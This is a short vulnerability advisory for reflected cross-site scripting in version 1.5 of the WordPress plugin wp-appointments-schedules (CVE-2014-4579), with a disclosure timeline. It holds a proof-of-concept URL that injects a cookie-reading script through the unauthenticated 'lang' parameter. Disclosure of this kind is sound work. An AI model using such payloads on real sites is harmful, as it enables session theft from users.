Plugin Details
Plugin Name: wp-plugin : wp-appointments-schedules
Effected Version : 1.5 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wp-appointments-schedules/js/test.php?lang=">alert(document.cookie)&
Vulnerable Parameter : lang
Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Status : Updated on
Public Disclosure : June 12, 2014
CVE Number : CVE-2014-4579
Plugin Description :
[|
This wordpress plugin will let you create and manage schedules.
You can add, delete, and manage appointments for each schedule.
Individual schedules can be displayed on the website and may be
enabled to allow online reservations by registered users.
To add a schedule to a page add "[[DISPLAYSCHEDULE_PAUL]]" to the post in the page of interest for a schedule created with the name "Paul".
]